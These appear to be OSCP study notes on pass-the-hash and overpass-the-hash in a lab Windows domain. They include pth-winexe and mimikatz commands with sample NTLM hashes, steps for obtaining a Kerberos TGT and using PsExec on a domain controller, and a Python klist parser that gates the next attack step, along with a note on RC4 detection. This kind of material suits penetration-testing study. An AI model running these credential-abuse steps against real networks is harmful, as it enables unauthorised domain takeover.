OSCP Notes

Pass the NTLM hash

winexe -U jenkins/administrator // cmd.exe
Tried: pth-winexe -U jenkins/administrator // cmd.exe
Paste the NTLM hash when prompted. (This may be the go-to!)
pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e // cmd
The credential after % is LM:NT. aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty password, so it is used as the LM half whenever only the NT hash is known; the target host goes after //.
sekurlsa::pth /user:jeff_admin /domain:corp.com /ntlm:e2b475c11da2a0748290d87aa966c327 /run:PowerShell.exe
Run this inside mimikatz from an elevated prompt after privilege::debug. At this point, we have a new PowerShell session that allows us to execute commands as jeff_admin.
Let's list the cached Kerberos tickets with klist:
No Kerberos tickets have been cached, which is expected since the account has not performed an interactive login. However, we can generate a TGT by authenticating to a network share on the domain controller with net use. Because the session was created from the NT hash, Windows uses that hash as the Kerberos (RC4) key when requesting the TGT, so no password is needed (overpass-the-hash):
PS C:\Windows\system32> net use \\dc01
The command completed successfully.
PS C:\Windows\system32> klist
Now run .\PsExec.exe \\dc01 cmd.exe; the cached TGT is used to obtain a service ticket for dc01 and the command runs on the domain controller as jeff_admin.
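Added example (not from the original notes): a small parser for Windows klist output that confirms a krbtgt TGT for the expected realm is cached before going on to PsExec, and that flags the RC4 encryption type a hash-derived TGT carries. The two klist transcripts are constructed to match the before/after states described above (the format is a typical Windows 10 klist listing, not output copied from the page); function names are my own.

```python
import re

# Constructed sample: klist before net use, no tickets for the pth session.
KLIST_BEFORE = """
Current LogonId is 0:0x3e7

Cached Tickets: (0)
"""

# Constructed sample: klist after `net use \\dc01` from the same session.
KLIST_AFTER_NET_USE = """
Current LogonId is 0:0x3e7

Cached Tickets: (2)

#0>     Client: jeff_admin @ CORP.COM
        Server: krbtgt/CORP.COM @ CORP.COM
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 2/14/2020 9:03:47 (local)
        End Time:   2/14/2020 19:03:47 (local)
        Renew Time: 2/21/2020 9:03:47 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: dc01

#1>     Client: jeff_admin @ CORP.COM
        Server: cifs/dc01 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 2/14/2020 9:03:47 (local)
        End Time:   2/14/2020 19:03:47 (local)
        Renew Time: 2/21/2020 9:03:47 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: dc01
"""

TICKET_START = re.compile(r"#(\d+)>\s*(.*)")


def parse_klist(output: str) -> list:
    """Return one dict per cached ticket, keyed by the klist field names."""
    tickets, current = [], None
    for raw in output.splitlines():
        line = raw.strip()
        m = TICKET_START.match(line)
        if m:                          # "#0>  Client: ..." opens a new ticket
            current = {}
            tickets.append(current)
            line = m.group(2)
        if current is None or not line:
            continue                   # header lines before the first ticket
        if line.startswith("Ticket Flags"):   # this field has no ':' after the key
            current["Ticket Flags"] = line[len("Ticket Flags"):].strip()
            continue
        key, sep, value = line.partition(":")
        if sep:
            current[key.strip()] = value.strip()
    return tickets


def tgt_for(tickets: list, realm: str):
    """The krbtgt ticket for `realm`, or None if no TGT is cached."""
    prefix = f"krbtgt/{realm.lower()}"
    for t in tickets:
        if t.get("Server", "").lower().startswith(prefix):
            return t
    return None


def is_rc4(ticket: dict) -> bool:
    """True when the ticket was issued with RC4-HMAC, the key type an NT hash yields."""
    return "RC4" in ticket.get("KerbTicket Encryption Type", "").upper()


def ready_for_psexec(output: str, realm: str) -> bool:
    """Gate for the next step: only proceed once a TGT for the realm is cached."""
    return tgt_for(parse_klist(output), realm) is not None


if __name__ == "__main__":
    print("before net use:", ready_for_psexec(KLIST_BEFORE, "CORP.COM"))
    tgt = tgt_for(parse_klist(KLIST_AFTER_NET_USE), "CORP.COM")
    print("after net use: ", tgt is not None, "(RC4 TGT)" if is_rc4(tgt) else "")
```

The RC4 check is the operational caveat: a TGT requested with /ntlm is RC4-encrypted, which shows up in the DC's 4768 events as encryption type 0x17 and is a common detection for overpass-the-hash in AES-only domains. If the AES keys are available, mimikatz accepts /aes256 instead of /ntlm for the same pth step.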